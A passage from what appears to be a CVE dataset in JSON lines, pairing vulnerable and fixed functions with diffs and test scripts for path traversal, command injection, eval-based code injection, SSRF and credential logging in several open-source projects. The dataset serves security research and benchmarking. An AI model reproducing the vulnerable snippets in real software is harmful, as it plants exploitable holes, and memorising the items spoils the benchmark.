pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/go-sonic/sonic", "patch_url": ["https://github.com/go-sonic/sonic/commit/5b826db82550b72d23ad74ffda755981a4b6abd9"], "programing_language": "Go", "vul_func": [{"id": "vul_go_194_1", "commit": "c97d242", "file_path": "service/impl/backup.go", "start_line": 49, "end_line": 75, "snippet": "func (b *backupServiceImpl) BackupWholeSite(ctx context.Context, toBackupItems []string) (*dto.BackupDTO, error) {\n\tbackupFilename := consts.SonicBackupPrefix + time.Now().Format(\"2006-01-02-15-04-05\") + util.GenUUIDWithOutDash() + \".zip\"\n\tbackupFilePath := config.BackupDir\n\n\tif _, err := os.Stat(backupFilePath); os.IsNotExist(err) {\n\t\terr = os.MkdirAll(backupFilePath, os.ModePerm)\n\t\tif err != nil {\n\t\t\treturn nil, xerr.NoType.Wrap(err).WithMsg(\"create dir err\")\n\t\t}\n\t} else if err != nil {\n\t\treturn nil, xerr.NoType.Wrap(err).WithMsg(\"get fileInfo\")\n\t}\n\n\tbackupFile := filepath.Join(backupFilePath, backupFilename)\n\n\ttoBackupPaths := []string{}\n\tfor _, toBackupItem := range toBackupItems {\n\t\ttoBackupPath := filepath.Join(b.Config.Sonic.WorkDir, toBackupItem)\n\t\ttoBackupPaths = append(toBackupPaths, toBackupPath)\n\t}\n\n\terr := util.ZipFile(backupFile, toBackupPaths...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn b.buildBackupDTO(ctx, string(service.WholeSite), backupFile)\n}"}], "fix_func": [{"id": "fix_go_194_1", "commit": "5b826db", "file_path": "service/impl/backup.go", "start_line": 49, "end_line": 78, "snippet": "func (b *backupServiceImpl) BackupWholeSite(ctx 
context.Context, toBackupItems []string) (*dto.BackupDTO, error) {\n\tbackupFilename := consts.SonicBackupPrefix + time.Now().Format(\"2006-01-02-15-04-05\") + util.GenUUIDWithOutDash() + \".zip\"\n\tbackupFilePath := config.BackupDir\n\n\tif _, err := os.Stat(backupFilePath); os.IsNotExist(err) {\n\t\terr = os.MkdirAll(backupFilePath, os.ModePerm)\n\t\tif err != nil {\n\t\t\treturn nil, xerr.NoType.Wrap(err).WithMsg(\"create dir err\")\n\t\t}\n\t} else if err != nil {\n\t\treturn nil, xerr.NoType.Wrap(err).WithMsg(\"get fileInfo\")\n\t}\n\n\tbackupFile := filepath.Join(backupFilePath, backupFilename)\n\n\ttoBackupPaths := []string{}\n\tfor _, toBackupItem := range toBackupItems {\n\t\ttoBackupPath := filepath.Clean(filepath.Join(b.Config.Sonic.WorkDir, toBackupItem))\n\t\tif !strings.HasPrefix(toBackupPath, b.Config.Sonic.WorkDir) {\n\t\t\tcontinue\n\t\t}\n\t\ttoBackupPaths = append(toBackupPaths, toBackupPath)\n\t}\n\n\terr := util.ZipFile(backupFile, toBackupPaths...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn b.buildBackupDTO(ctx, string(service.WholeSite), backupFile)\n}"}], "vul_patch": "--- a/service/impl/backup.go\n+++ b/service/impl/backup.go\n@@ -15,7 +15,10 @@\n \n \ttoBackupPaths := []string{}\n \tfor _, toBackupItem := range toBackupItems {\n-\t\ttoBackupPath := filepath.Join(b.Config.Sonic.WorkDir, toBackupItem)\n+\t\ttoBackupPath := filepath.Clean(filepath.Join(b.Config.Sonic.WorkDir, toBackupItem))\n+\t\tif !strings.HasPrefix(toBackupPath, b.Config.Sonic.WorkDir) {\n+\t\t\tcontinue\n+\t\t}\n \t\ttoBackupPaths = append(toBackupPaths, toBackupPath)\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-4444", "cve_description": "The allow_execmod plugin for setroubleshoot before 3.2.23 allows local users to execute arbitrary commands by triggering an execmod SELinux denial with a crafted binary filename, related to the commands.getstatusoutput function.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/fedora-selinux/setroubleshoot", "patch_url": ["https://github.com/fedora-selinux/setroubleshoot/commit/5cd60033ea7f5bdf8c19c27b23ea2d773d9b09f5"], "programing_language": "Python", "vul_func": [{"id": "vul_py_196_1", "commit": "2d12677", "file_path": "plugins/src/allow_execmod.py", "start_line": 93, "end_line": 103, "snippet": " def analyze(self, avc):\n import commands\n if avc.has_any_access_in(['execmod']):\n # MATCH\n if (commands.getstatusoutput(\"eu-readelf -d %s | fgrep -q TEXTREL\" % avc.tpath)[0] == 1):\n return self.report((\"unsafe\"))\n\n mcon = selinux.matchpathcon(avc.tpath.strip('\"'), S_IFREG)[1]\n if mcon.split(\":\")[2] == \"lib_t\":\n return self.report()\n return None"}], "fix_func": [{"id": "fix_py_196_1", "commit": "5cd6003", "file_path": "plugins/src/allow_execmod.py", "start_line": 93, "end_line": 109, "snippet": " def analyze(self, avc):\n import subprocess\n if avc.has_any_access_in(['execmod']):\n # MATCH\n # from https://docs.python.org/2.7/library/subprocess.html#replacing-shell-pipeline\n p1 = subprocess.Popen(['eu-readelf', '-d', avc.tpath], stdout=subprocess.PIPE)\n p2 = subprocess.Popen([\"fgrep\", \"-q\", \"TEXTREL\"], stdin=p1.stdout, 
stdout=subprocess.PIPE)\n p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.\n p1.wait()\n p2.wait()\n if p2.returncode == 1:\n return self.report((\"unsafe\"))\n\n mcon = selinux.matchpathcon(avc.tpath.strip('\"'), S_IFREG)[1]\n if mcon.split(\":\")[2] == \"lib_t\":\n return self.report()\n return None"}], "vul_patch": "--- a/plugins/src/allow_execmod.py\n+++ b/plugins/src/allow_execmod.py\n@@ -1,8 +1,14 @@\n def analyze(self, avc):\n- import commands\n+ import subprocess\n if avc.has_any_access_in(['execmod']):\n # MATCH\n- if (commands.getstatusoutput(\"eu-readelf -d %s | fgrep -q TEXTREL\" % avc.tpath)[0] == 1):\n+ # from https://docs.python.org/2.7/library/subprocess.html#replacing-shell-pipeline\n+ p1 = subprocess.Popen(['eu-readelf', '-d', avc.tpath], stdout=subprocess.PIPE)\n+ p2 = subprocess.Popen([\"fgrep\", \"-q\", \"TEXTREL\"], stdin=p1.stdout, stdout=subprocess.PIPE)\n+ p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.\n+ p1.wait()\n+ p2.wait()\n+ if p2.returncode == 1:\n return self.report((\"unsafe\"))\n \n mcon = selinux.matchpathcon(avc.tpath.strip('\"'), S_IFREG)[1]\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-8374", "cve_description": "UltiMaker Cura slicer versions 5.7.0-beta.1 through 5.7.2 are vulnerable to code injection via the 3MF format reader (/plugins/ThreeMFReader.py). The vulnerability arises from improper handling of the drop_to_buildplate property within 3MF files, which are ZIP archives containing the model data. When a 3MF file is loaded in Cura, the value of the drop_to_buildplate property is passed to the Python eval() function without proper sanitization, allowing an attacker to execute arbitrary code by crafting a malicious 3MF file. This vulnerability poses a significant risk as 3MF files are commonly shared via 3D model databases.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/Ultimaker/Cura", "patch_url": ["https://github.com/Ultimaker/Cura/commit/285a241eb28da3188c977f85d68937c0dad79c50"], "programing_language": "Python", "vul_func": [{"id": "vul_py_130_1", "commit": "2d85e9f", "file_path": "plugins/3MFReader/ThreeMFReader.py", "start_line": 96, "end_line": 216, "snippet": " def _convertSavitarNodeToUMNode(savitar_node: Savitar.SceneNode, file_name: str = \"\") -> Optional[SceneNode]:\n \"\"\"Convenience function that converts a SceneNode object (as obtained from libSavitar) to a scene node.\n\n :returns: Scene node.\n \"\"\"\n try:\n node_name = savitar_node.getName()\n node_id = savitar_node.getId()\n except AttributeError:\n Logger.log(\"e\", \"Outdated version of libSavitar detected! 
Please update to the newest version!\")\n node_name = \"\"\n node_id = \"\"\n\n if node_name == \"\":\n if file_name != \"\":\n node_name = os.path.basename(file_name)\n else:\n node_name = \"Object {}\".format(node_id)\n\n active_build_plate = CuraApplication.getInstance().getMultiBuildPlateModel().activeBuildPlate\n\n um_node = CuraSceneNode() # This adds a SettingOverrideDecorator\n um_node.addDecorator(BuildPlateDecorator(active_build_plate))\n try:\n um_node.addDecorator(ConvexHullDecorator())\n except:\n pass\n um_node.setName(node_name)\n um_node.setId(node_id)\n transformation = ThreeMFReader._createMatrixFromTransformationString(savitar_node.getTransformation())\n um_node.setTransformation(transformation)\n mesh_builder = MeshBuilder()\n\n data = numpy.fromstring(savitar_node.getMeshData().getFlatVerticesAsBytes(), dtype=numpy.float32)\n\n vertices = numpy.resize(data, (int(data.size / 3), 3))\n mesh_builder.setVertices(vertices)\n mesh_builder.calculateNormals(fast=True)\n if file_name:\n # The filename is used to give the user the option to reload the file if it is changed on disk\n # It is only set for the root node of the 3mf file\n mesh_builder.setFileName(file_name)\n mesh_data = mesh_builder.build()\n\n if len(mesh_data.getVertices()):\n um_node.setMeshData(mesh_data)\n\n for child in savitar_node.getChildren():\n child_node = ThreeMFReader._convertSavitarNodeToUMNode(child)\n if child_node:\n um_node.addChild(child_node)\n\n if um_node.getMeshData() is None and len(um_node.getChildren()) == 0:\n return None\n\n settings = savitar_node.getSettings()\n\n # Add the setting override decorator, so we can add settings to this node.\n if settings:\n global_container_stack = CuraApplication.getInstance().getGlobalContainerStack()\n\n # Ensure the correct next container for the SettingOverride decorator is set.\n if global_container_stack:\n default_stack = ExtruderManager.getInstance().getExtruderStack(0)\n\n if default_stack:\n um_node.callDecoration(\"setActiveExtruder\", default_stack.getId())\n\n # Get the definition & set it\n definition_id = ContainerTree.getInstance().machines[global_container_stack.definition.getId()].quality_definition\n um_node.callDecoration(\"getStack\").getTop().setDefinition(definition_id)\n\n setting_container = um_node.callDecoration(\"getStack\").getTop()\n known_setting_keys = um_node.callDecoration(\"getStack\").getAllKeys()\n for key in settings:\n setting_value = settings[key].value\n\n # Extruder_nr is a special case.\n if key == \"extruder_nr\":\n extruder_stack = ExtruderManager.getInstance().getExtruderStack(int(setting_value))\n if extruder_stack:\n um_node.callDecoration(\"setActiveExtruder\", extruder_stack.getId())\n else:\n Logger.log(\"w\", \"Unable to find extruder in position %s\", setting_value)\n continue\n if key == \"print_order\":\n um_node.printOrder = int(setting_value)\n continue\n if key ==\"drop_to_buildplate\":\n um_node.setSetting(SceneNodeSettings.AutoDropDown, eval(setting_value))\n continue\n if key in known_setting_keys:\n setting_container.setProperty(key, \"value\", setting_value)\n else:\n um_node.metadata[key] = settings[key]\n\n if len(um_node.getChildren()) > 0 and um_node.getMeshData() is None:\n if len(um_node.getAllChildren()) == 1:\n # We don't want groups of one, so move the node up one \"level\"\n child_node = um_node.getChildren()[0]\n # Move all the meshes of children so that toolhandles are shown in the correct place.\n if child_node.getMeshData():\n extents = child_node.getMeshData().getExtents()\n 
move_matrix = Matrix()\n move_matrix.translate(-extents.center)\n child_node.setMeshData(child_node.getMeshData().getTransformed(move_matrix))\n child_node.translate(extents.center)\n parent_transformation = um_node.getLocalTransformation()\n child_transformation = child_node.getLocalTransformation()\n child_node.setTransformation(parent_transformation.multiply(child_transformation))\n um_node = cast(CuraSceneNode, um_node.getChildren()[0])\n else:\n group_decorator = GroupDecorator()\n um_node.addDecorator(group_decorator)\n um_node.setSelectable(True)\n if um_node.getMeshData():\n # Assuming that all nodes with mesh data are printable objects\n # affects (auto) slicing\n sliceable_decorator = SliceableObjectDecorator()\n um_node.addDecorator(sliceable_decorator)\n return um_node"}], "fix_func": [{"id": "fix_py_130_1", "commit": "285a241", "file_path": "plugins/3MFReader/ThreeMFReader.py", "start_line": 97, "end_line": 217, "snippet": " def _convertSavitarNodeToUMNode(savitar_node: Savitar.SceneNode, file_name: str = \"\") -> Optional[SceneNode]:\n \"\"\"Convenience function that converts a SceneNode object (as obtained from libSavitar) to a scene node.\n\n :returns: Scene node.\n \"\"\"\n try:\n node_name = savitar_node.getName()\n node_id = savitar_node.getId()\n except AttributeError:\n Logger.log(\"e\", \"Outdated version of libSavitar detected! Please update to the newest version!\")\n node_name = \"\"\n node_id = \"\"\n\n if node_name == \"\":\n if file_name != \"\":\n node_name = os.path.basename(file_name)\n else:\n node_name = \"Object {}\".format(node_id)\n\n active_build_plate = CuraApplication.getInstance().getMultiBuildPlateModel().activeBuildPlate\n\n um_node = CuraSceneNode() # This adds a SettingOverrideDecorator\n um_node.addDecorator(BuildPlateDecorator(active_build_plate))\n try:\n um_node.addDecorator(ConvexHullDecorator())\n except:\n pass\n um_node.setName(node_name)\n um_node.setId(node_id)\n transformation = ThreeMFReader._createMatrixFromTransformationString(savitar_node.getTransformation())\n um_node.setTransformation(transformation)\n mesh_builder = MeshBuilder()\n\n data = numpy.fromstring(savitar_node.getMeshData().getFlatVerticesAsBytes(), dtype=numpy.float32)\n\n vertices = numpy.resize(data, (int(data.size / 3), 3))\n mesh_builder.setVertices(vertices)\n mesh_builder.calculateNormals(fast=True)\n if file_name:\n # The filename is used to give the user the option to reload the file if it is changed on disk\n # It is only set for the root node of the 3mf file\n mesh_builder.setFileName(file_name)\n mesh_data = mesh_builder.build()\n\n if len(mesh_data.getVertices()):\n um_node.setMeshData(mesh_data)\n\n for child in savitar_node.getChildren():\n child_node = ThreeMFReader._convertSavitarNodeToUMNode(child)\n if child_node:\n um_node.addChild(child_node)\n\n if um_node.getMeshData() is None and len(um_node.getChildren()) == 0:\n return None\n\n settings = savitar_node.getSettings()\n\n # Add the setting override decorator, so we can add settings to this node.\n if settings:\n global_container_stack = CuraApplication.getInstance().getGlobalContainerStack()\n\n # Ensure the correct next container for the SettingOverride decorator is set.\n if global_container_stack:\n default_stack = ExtruderManager.getInstance().getExtruderStack(0)\n\n if default_stack:\n um_node.callDecoration(\"setActiveExtruder\", default_stack.getId())\n\n # Get the definition & set it\n definition_id = 
ContainerTree.getInstance().machines[global_container_stack.definition.getId()].quality_definition\n um_node.callDecoration(\"getStack\").getTop().setDefinition(definition_id)\n\n setting_container = um_node.callDecoration(\"getStack\").getTop()\n known_setting_keys = um_node.callDecoration(\"getStack\").getAllKeys()\n for key in settings:\n setting_value = settings[key].value\n\n # Extruder_nr is a special case.\n if key == \"extruder_nr\":\n extruder_stack = ExtruderManager.getInstance().getExtruderStack(int(setting_value))\n if extruder_stack:\n um_node.callDecoration(\"setActiveExtruder\", extruder_stack.getId())\n else:\n Logger.log(\"w\", \"Unable to find extruder in position %s\", setting_value)\n continue\n if key == \"print_order\":\n um_node.printOrder = int(setting_value)\n continue\n if key ==\"drop_to_buildplate\":\n um_node.setSetting(SceneNodeSettings.AutoDropDown, parseBool(setting_value))\n continue\n if key in known_setting_keys:\n setting_container.setProperty(key, \"value\", setting_value)\n else:\n um_node.metadata[key] = settings[key]\n\n if len(um_node.getChildren()) > 0 and um_node.getMeshData() is None:\n if len(um_node.getAllChildren()) == 1:\n # We don't want groups of one, so move the node up one \"level\"\n child_node = um_node.getChildren()[0]\n # Move all the meshes of children so that toolhandles are shown in the correct place.\n if child_node.getMeshData():\n extents = child_node.getMeshData().getExtents()\n move_matrix = Matrix()\n move_matrix.translate(-extents.center)\n child_node.setMeshData(child_node.getMeshData().getTransformed(move_matrix))\n child_node.translate(extents.center)\n parent_transformation = um_node.getLocalTransformation()\n child_transformation = child_node.getLocalTransformation()\n child_node.setTransformation(parent_transformation.multiply(child_transformation))\n um_node = cast(CuraSceneNode, um_node.getChildren()[0])\n else:\n group_decorator = GroupDecorator()\n um_node.addDecorator(group_decorator)\n um_node.setSelectable(True)\n if um_node.getMeshData():\n # Assuming that all nodes with mesh data are printable objects\n # affects (auto) slicing\n sliceable_decorator = SliceableObjectDecorator()\n um_node.addDecorator(sliceable_decorator)\n return um_node"}], "vul_patch": "--- a/plugins/3MFReader/ThreeMFReader.py\n+++ b/plugins/3MFReader/ThreeMFReader.py\n@@ -87,7 +87,7 @@\n um_node.printOrder = int(setting_value)\n continue\n if key ==\"drop_to_buildplate\":\n- um_node.setSetting(SceneNodeSettings.AutoDropDown, eval(setting_value))\n+ um_node.setSetting(SceneNodeSettings.AutoDropDown, parseBool(setting_value))\n continue\n if key in known_setting_keys:\n setting_container.setProperty(key, \"value\", setting_value)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-29028", "cve_description": "memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /o/get/httpmeta that allows unauthenticated users to enumerate the internal network and receive limited html values in json form. 
This vulnerability is fixed in 0.16.1.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/usememos/memos", "patch_url": ["https://github.com/usememos/memos/commit/6ffc09d86a1302c384ef085aa70c7bddb3ce7ba9"], "programing_language": "Go", "vul_func": [{"id": "vul_go_126_1", "commit": "125c9c9", "file_path": "api/v1/http_getter.go", "start_line": 13, "end_line": 19, "snippet": "func (*APIV1Service) registerGetterPublicRoutes(g *echo.Group) {\n\t// GET /get/httpmeta?url={url} - Get website meta.\n\tg.GET(\"/get/httpmeta\", GetWebsiteMetadata)\n\n\t// GET /get/image?url={url} - Get image.\n\tg.GET(\"/get/image\", GetImage)\n}"}, {"id": "vul_go_126_2", "commit": "125c9c9", "file_path": "api/v1/http_getter.go", "start_line": 21, "end_line": 45, "snippet": "// GetWebsiteMetadata godoc\n//\n//\t@Summary\tGet website metadata\n//\t@Tags\t\tget\n//\t@Produce\tjson\n//\t@Param\t\turl\tquery\t\tstring\t\t\ttrue\t\"Website URL\"\n//\t@Success\t200\t{object}\tgetter.HTMLMeta\t\"Extracted metadata\"\n//\t@Failure\t400\t{object}\tnil\t\t\t\t\"Missing website url | Wrong url\"\n//\t@Failure\t406\t{object}\tnil\t\t\t\t\"Failed to get website meta with url: %s\"\n//\t@Router\t\t/o/get/GetWebsiteMetadata [GET]\nfunc GetWebsiteMetadata(c echo.Context) error {\n\turlStr := c.QueryParam(\"url\")\n\tif urlStr == \"\" {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, \"Missing website url\")\n\t}\n\tif _, err := url.Parse(urlStr); err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, \"Wrong url\").SetInternal(err)\n\t}\n\n\thtmlMeta, err := getter.GetHTMLMeta(urlStr)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusNotAcceptable, fmt.Sprintf(\"Failed to get website meta with url: %s\", urlStr)).SetInternal(err)\n\t}\n\treturn c.JSON(http.StatusOK, htmlMeta)\n}"}], "fix_func": [{"id": "fix_go_126_1", "commit": "6ffc09d", "file_path": "api/v1/http_getter.go", "start_line": 13, "end_line": 16, "snippet": "func (*APIV1Service) registerGetterPublicRoutes(g *echo.Group) {\n\t// GET /get/image?url={url} - Get image.\n\tg.GET(\"/get/image\", GetImage)\n}"}], "vul_patch": "--- a/api/v1/http_getter.go\n+++ b/api/v1/http_getter.go\n@@ -1,7 +1,4 @@\n func (*APIV1Service) registerGetterPublicRoutes(g *echo.Group) {\n-\t// GET /get/httpmeta?url={url} - Get website meta.\n-\tg.GET(\"/get/httpmeta\", GetWebsiteMetadata)\n-\n \t// GET /get/image?url={url} - Get image.\n \tg.GET(\"/get/image\", GetImage)\n }\n\n--- a/api/v1/http_getter.go\n+++ /dev/null\n@@ -1,25 +0,0 @@\n-// GetWebsiteMetadata godoc\n-//\n-//\t@Summary\tGet website metadata\n-//\t@Tags\t\tget\n-//\t@Produce\tjson\n-//\t@Param\t\turl\tquery\t\tstring\t\t\ttrue\t\"Website URL\"\n-//\t@Success\t200\t{object}\tgetter.HTMLMeta\t\"Extracted metadata\"\n-//\t@Failure\t400\t{object}\tnil\t\t\t\t\"Missing website url | Wrong url\"\n-//\t@Failure\t406\t{object}\tnil\t\t\t\t\"Failed to get website meta with url: %s\"\n-//\t@Router\t\t/o/get/GetWebsiteMetadata [GET]\n-func GetWebsiteMetadata(c echo.Context) error {\n-\turlStr := c.QueryParam(\"url\")\n-\tif urlStr == \"\" {\n-\t\treturn echo.NewHTTPError(http.StatusBadRequest, \"Missing website url\")\n-\t}\n-\tif _, err := url.Parse(urlStr); err != nil {\n-\t\treturn echo.NewHTTPError(http.StatusBadRequest, \"Wrong 
url\").SetInternal(err)\n-\t}\n-\n-\thtmlMeta, err := getter.GetHTMLMeta(urlStr)\n-\tif err != nil {\n-\t\treturn echo.NewHTTPError(http.StatusNotAcceptable, fmt.Sprintf(\"Failed to get website meta with url: %s\", urlStr)).SetInternal(err)\n-\t}\n-\treturn c.JSON(http.StatusOK, htmlMeta)\n-}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-36157", "cve_description": "An issue was discovered in Grafana Cortex through 1.9.0. The header value X-Scope-OrgID is used to construct file paths for rules files, and if crafted to conduct directory traversal such as ae ../../sensitive/path/in/deployment pathname, then Cortex will attempt to parse a rules file at that location and include some of the contents in the error message. (Other Cortex API requests can also be sent a malicious OrgID header, e.g., tricking the ingester into writing metrics to a different location, but the effect is nuisance rather than information disclosure.)", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/cortexproject/cortex", "patch_url": ["https://github.com/cortexproject/cortex/commit/d9e1f81f40c607b9e97c2fc6db70ae54679917c4"], "programing_language": "Go", "vul_func": [{"id": "vul_go_22_1", "commit": "1e4e0ca", "file_path": "pkg/tenant/resolver.go", "start_line": 67, "end_line": 74, "snippet": "func (t *SingleResolver) TenantIDs(ctx context.Context) ([]string, error) {\n\t//lint:ignore faillint wrapper around upstream method\n\torgID, err := user.ExtractOrgID(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn []string{orgID}, err\n}"}], "fix_func": [{"id": "fix_go_22_1", "commit": "d9e1f81", "file_path": "pkg/tenant/resolver.go", "start_line": 91, "end_line": 97, "snippet": "func (t *SingleResolver) TenantIDs(ctx context.Context) ([]string, error) {\n\torgID, err := t.TenantID(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn []string{orgID}, err\n}"}, {"id": "fix_go_22_2", "commit": "d9e1f81", "file_path": "pkg/tenant/resolver.go", "start_line": 66, "end_line": 75, "snippet": "func containsUnsafePathSegments(id string) bool {\n\t// handle the relative reference to current and parent path.\n\tif id == \".\" || id == \"..\" {\n\t\treturn true\n\t}\n\n\treturn strings.ContainsAny(id, \"\\\\/\")\n}\n\nvar errInvalidTenantID = errors.New(\"invalid tenant ID\")"}, {"id": "fix_go_22_3", "commit": "d9e1f81", "file_path": "pkg/tenant/resolver.go", "start_line": 77, "end_line": 89, "snippet": "func (t *SingleResolver) TenantID(ctx context.Context) (string, error) {\n\t//lint:ignore faillint wrapper around upstream method\n\tid, err := user.ExtractOrgID(ctx)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif containsUnsafePathSegments(id) {\n\t\treturn \"\", errInvalidTenantID\n\t}\n\n\treturn id, nil\n}"}], "vul_patch": "--- a/pkg/tenant/resolver.go\n+++ b/pkg/tenant/resolver.go\n@@ -1,6 +1,5 @@\n func (t *SingleResolver) TenantIDs(ctx 
context.Context) ([]string, error) {\n-\t//lint:ignore faillint wrapper around upstream method\n-\torgID, err := user.ExtractOrgID(ctx)\n+\torgID, err := t.TenantID(ctx)\n \tif err != nil {\n \t\treturn nil, err\n \t}\n\n--- /dev/null\n+++ b/pkg/tenant/resolver.go\n@@ -0,0 +1,10 @@\n+func containsUnsafePathSegments(id string) bool {\n+\t// handle the relative reference to current and parent path.\n+\tif id == \".\" || id == \"..\" {\n+\t\treturn true\n+\t}\n+\n+\treturn strings.ContainsAny(id, \"\\\\/\")\n+}\n+\n+var errInvalidTenantID = errors.New(\"invalid tenant ID\")\n\n--- /dev/null\n+++ b/pkg/tenant/resolver.go\n@@ -0,0 +1,13 @@\n+func (t *SingleResolver) TenantID(ctx context.Context) (string, error) {\n+\t//lint:ignore faillint wrapper around upstream method\n+\tid, err := user.ExtractOrgID(ctx)\n+\tif err != nil {\n+\t\treturn \"\", err\n+\t}\n+\n+\tif containsUnsafePathSegments(id) {\n+\t\treturn \"\", errInvalidTenantID\n+\t}\n+\n+\treturn id, nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-36157:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cortex\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestSingleResolver$ github.com/cortexproject/cortex/pkg/tenant\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-36157:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/cortex\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestSingleResolver|TestMultiResolver)$' github.com/cortexproject/cortex/pkg/tenant\n"} {"cve_id": "CVE-2020-7675", "cve_description": "cd-messenger through 2.7.26 is vulnerable to Arbitrary Code Execution. User input provided to the `color` argument is executed by the `eval` function, resulting in code execution.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/mikeerickson/cd-messenger", "patch_url": ["https://github.com/mikeerickson/cd-messenger/commit/cbdf7d8c06463388fd4f088bfbdc5eeaa65eba56"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_12_1", "commit": "f0ebcff", "file_path": "src/messenger-node.js", "start_line": "68", "end_line": "77", "snippet": " line: color => {\n if (color.length > 0) {\n try {\n eval(`cl.${color}()`); // eslint-disable-line\n }\n catch (e) {\n console.error(chalk.bgRed.bold(`Invalid Color: ${color}`));\n }\n }\n },"}], "fix_func": [{"id": "fix_js_12_1", "commit": "cbdf7d8", "file_path": "src/messenger-node.js", "start_line": 68, "end_line": 77, "snippet": " line: color => {\n if (color.length > 0) {\n if (typeof cl[color] === 'function') {\n cl[color]();\n }\n else {\n console.error(chalk.bgRed.bold(`Invalid Color: ${color}`));\n }\n }\n },"}], "vul_patch": "--- a/src/messenger-node.js\n+++ b/src/messenger-node.js\n@@ -1,9 +1,9 @@\n line: color => {\n if (color.length > 0) {\n- try {\n- eval(`cl.${color}()`); // eslint-disable-line\n+ if (typeof cl[color] === 'function') {\n+ cl[color]();\n }\n- catch (e) {\n+ else {\n console.error(chalk.bgRed.bold(`Invalid Color: ${color}`));\n }\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7675:latest\n# bash 
/workspace/fix-run.sh\nset -e\n\ncd /workspace/cd-messenger\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2023-34097", "cve_description": "hoppscotch is an open source API development ecosystem. In versions prior to 2023.4.5 the database password is exposed in the logs when showing the database connection string. Attackers with access to read system logs will be able to elevate privilege with full access to the database. Users are advised to upgrade. There are no known workarounds for this vulnerability. ", "cwe_info": {"CWE-532": {"name": "Insertion of Sensitive Information into Log File", "description": "The product writes sensitive information to a log file."}}, "repo": "https://github.com/hoppscotch/hoppscotch", "patch_url": ["https://github.com/hoppscotch/hoppscotch/commit/15424903ede20b155d764abf4c4f7c2c84c11247"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_83_1", "commit": "1cce117", "file_path": "packages/hoppscotch-backend/src/main.ts", "start_line": "9", "end_line": "55", "snippet": "async function bootstrap() {\n console.log(`Running in production: ${process.env.PRODUCTION}`);\n console.log(`Port: ${process.env.PORT}`);\n console.log(`Database: ${process.env.DATABASE_URL}`);\n\n const app = await NestFactory.create(AppModule);\n\n app.use(\n session({\n secret: process.env.SESSION_SECRET,\n }),\n );\n\n // Increase fil upload limit to 50MB\n app.use(\n json({\n limit: '100mb',\n }),\n );\n\n if (process.env.PRODUCTION === 'false') {\n console.log('Enabling CORS with development settings');\n\n app.enableCors({\n origin: process.env.WHITELISTED_ORIGINS.split(','),\n credentials: true,\n });\n } else {\n console.log('Enabling CORS with production settings');\n\n app.enableCors({\n origin: process.env.WHITELISTED_ORIGINS.split(','),\n credentials: true,\n });\n }\n app.enableVersioning({\n type: VersioningType.URI,\n });\n app.use(cookieParser());\n await app.listen(process.env.PORT || 3170);\n}\n\nif (!process.env.GENERATE_GQL_SCHEMA) {\n bootstrap();\n} else {\n emitGQLSchemaFile();\n}"}], "fix_func": [{"id": "fix_js_83_1", "commit": "1542490", "file_path": "packages/hoppscotch-backend/src/main.ts", "start_line": "9", "end_line": "54", "snippet": "async function bootstrap() {\n console.log(`Running in production: ${process.env.PRODUCTION}`);\n console.log(`Port: ${process.env.PORT}`);\n\n const app = await NestFactory.create(AppModule);\n\n app.use(\n session({\n secret: process.env.SESSION_SECRET,\n }),\n );\n\n // Increase fil upload limit to 50MB\n app.use(\n json({\n limit: '100mb',\n }),\n );\n\n if (process.env.PRODUCTION === 'false') {\n console.log('Enabling CORS with development 